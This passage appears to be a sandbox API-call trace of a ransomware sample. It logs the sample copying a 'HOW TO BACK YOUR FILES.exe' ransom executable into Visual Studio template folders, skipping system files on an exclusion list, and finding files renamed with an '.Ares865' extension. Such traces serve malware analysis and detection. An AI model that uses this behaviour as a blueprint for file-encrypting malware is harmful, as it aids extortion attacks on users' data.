(x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp" [0128.656] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.656] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.657] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.657] GetLastError () returned 0x0 [0128.657] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0128.657] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0128.657] CloseHandle (hObject=0x120) returned 1 [0128.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0128.657] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.657] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x526e9820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x526e9820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.658] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.658] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.658] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0128.658] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x526e9820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x526e9820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.658] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.658] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0128.658] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0128.658] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0128.658] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5288c740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="aoldtz.exe") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="bootmgr") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="temp") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="pagefile.sys") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="ids.txt") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="ntuser.dat") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0128.658] lstrcmpiW (lpString1="1033", lpString2="MSBuild") returned -1 [0128.658] lstrlenW (lpString="1033") returned 4 [0128.658] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\*") returned 88 [0128.658] lstrcpyW (in: lpString1=0x2cce4ae, lpString2="1033" | out: lpString1="1033") returned="1033" [0128.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x324fc8 [0128.658] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.658] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x526e9820, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x526e9820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.658] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.659] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x526e9820, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x526e9820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0128.659] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.659] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0128.659] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033" [0128.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0128.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0128.659] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033") returned 91 [0128.659] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033" [0128.659] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.659] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.660] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.660] GetLastError () returned 0x0 [0128.660] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0128.660] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0128.660] CloseHandle (hObject=0x120) returned 1 [0128.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0128.660] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.660] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5288c740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.660] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.660] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.660] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0128.660] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f37b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5288c740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.661] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.661] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0128.661] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0128.661] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0128.661] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5270f980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x8e60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AboutBox.zip.Ares865", cAlternateFileName="ABOUTB~1.ARE")) returned 1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="aoldtz.exe") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2=".") returned 1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="..") returned 1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="windows") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="bootmgr") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="temp") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="boot") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="ids.txt") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="perflogs") returned -1 [0128.661] lstrcmpiW (lpString1="AboutBox.zip.Ares865", lpString2="MSBuild") returned -1 [0128.661] lstrlenW (lpString="AboutBox.zip.Ares865") returned 20 [0128.661] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\*") returned 93 [0128.661] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="AboutBox.zip.Ares865" | out: lpString1="AboutBox.zip.Ares865") returned="AboutBox.zip.Ares865" [0128.661] lstrlenW (lpString="AboutBox.zip.Ares865") returned 20 [0128.661] lstrlenW (lpString="Ares865") returned 7 [0128.661] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.661] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5270f980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppConfig.zip.Ares865", cAlternateFileName="APPCON~1.ARE")) returned 1 [0128.661] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.661] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.661] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2=".") returned 1 [0128.661] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="..") returned 1 [0128.661] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="windows") returned -1 [0128.661] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="bootmgr") returned -1 [0128.661] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="temp") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="boot") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="ids.txt") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="perflogs") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfig.zip.Ares865", lpString2="MSBuild") returned -1 [0128.662] lstrlenW (lpString="AppConfig.zip.Ares865") returned 21 [0128.662] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.Ares865") returned 112 [0128.662] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="AppConfig.zip.Ares865" | out: lpString1="AppConfig.zip.Ares865") returned="AppConfig.zip.Ares865" [0128.662] lstrlenW (lpString="AppConfig.zip.Ares865") returned 21 [0128.662] lstrlenW (lpString="Ares865") returned 7 [0128.662] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.662] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52735ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x570, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppConfigInternal.zip.Ares865", cAlternateFileName="APPCON~2.ARE")) returned 1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2=".") returned 1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="..") returned 1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="windows") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="bootmgr") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="temp") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="boot") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="ids.txt") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="perflogs") returned -1 [0128.662] lstrcmpiW (lpString1="AppConfigInternal.zip.Ares865", lpString2="MSBuild") returned -1 [0128.662] lstrlenW (lpString="AppConfigInternal.zip.Ares865") returned 29 [0128.662] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.Ares865") returned 113 [0128.662] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="AppConfigInternal.zip.Ares865" | out: lpString1="AppConfigInternal.zip.Ares865") returned="AppConfigInternal.zip.Ares865" [0128.662] lstrlenW (lpString="AppConfigInternal.zip.Ares865") returned 29 [0128.662] lstrlenW (lpString="Ares865") returned 7 [0128.662] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.662] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52735ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AssemblyInfo.zip.Ares865", cAlternateFileName="ASSEMB~1.ARE")) returned 1 [0128.663] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.663] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.663] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2=".") returned 1 [0128.663] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="..") returned 1 [0128.663] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="windows") returned -1 [0128.663] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="bootmgr") returned -1 [0128.667] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="temp") returned -1 [0128.667] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="boot") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="ids.txt") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="perflogs") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfo.zip.Ares865", lpString2="MSBuild") returned -1 [0128.668] lstrlenW (lpString="AssemblyInfo.zip.Ares865") returned 24 [0128.668] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.Ares865") returned 121 [0128.668] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="AssemblyInfo.zip.Ares865" | out: lpString1="AssemblyInfo.zip.Ares865") returned="AssemblyInfo.zip.Ares865" [0128.668] lstrlenW (lpString="AssemblyInfo.zip.Ares865") returned 24 [0128.668] lstrlenW (lpString="Ares865") returned 7 [0128.668] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.668] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5275bc40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AssemblyInfoInternal.zip.Ares865", cAlternateFileName="ASSEMB~2.ARE")) returned 1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2=".") returned 1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="..") returned 1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="windows") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="bootmgr") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="temp") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="boot") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="ids.txt") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="perflogs") returned -1 [0128.668] lstrcmpiW (lpString1="AssemblyInfoInternal.zip.Ares865", lpString2="MSBuild") returned -1 [0128.668] lstrlenW (lpString="AssemblyInfoInternal.zip.Ares865") returned 32 [0128.668] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip.Ares865") returned 116 [0128.668] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="AssemblyInfoInternal.zip.Ares865" | out: lpString1="AssemblyInfoInternal.zip.Ares865") returned="AssemblyInfoInternal.zip.Ares865" [0128.668] lstrlenW (lpString="AssemblyInfoInternal.zip.Ares865") returned 32 [0128.668] lstrlenW (lpString="Ares865") returned 7 [0128.668] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.669] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52781da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Class.zip.Ares865", cAlternateFileName="CLASSZ~1.ARE")) returned 1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="aoldtz.exe") returned 1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2=".") returned 1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="..") returned 1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="windows") returned -1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="bootmgr") returned 1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="temp") returned -1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="pagefile.sys") returned -1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="boot") returned 1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="ids.txt") returned -1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="ntuser.dat") returned -1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="perflogs") returned -1 [0128.669] lstrcmpiW (lpString1="Class.zip.Ares865", lpString2="MSBuild") returned -1 [0128.669] lstrlenW (lpString="Class.zip.Ares865") returned 17 [0128.669] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfoInternal.zip.Ares865") returned 124 [0128.669] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Class.zip.Ares865" | out: lpString1="Class.zip.Ares865") returned="Class.zip.Ares865" [0128.669] lstrlenW (lpString="Class.zip.Ares865") returned 17 [0128.669] lstrlenW (lpString="Ares865") returned 7 [0128.669] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.669] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f83e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x52781da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CodeFile.zip.Ares865", cAlternateFileName="CODEFI~1.ARE")) returned 1 [0128.669] lstrcmpiW 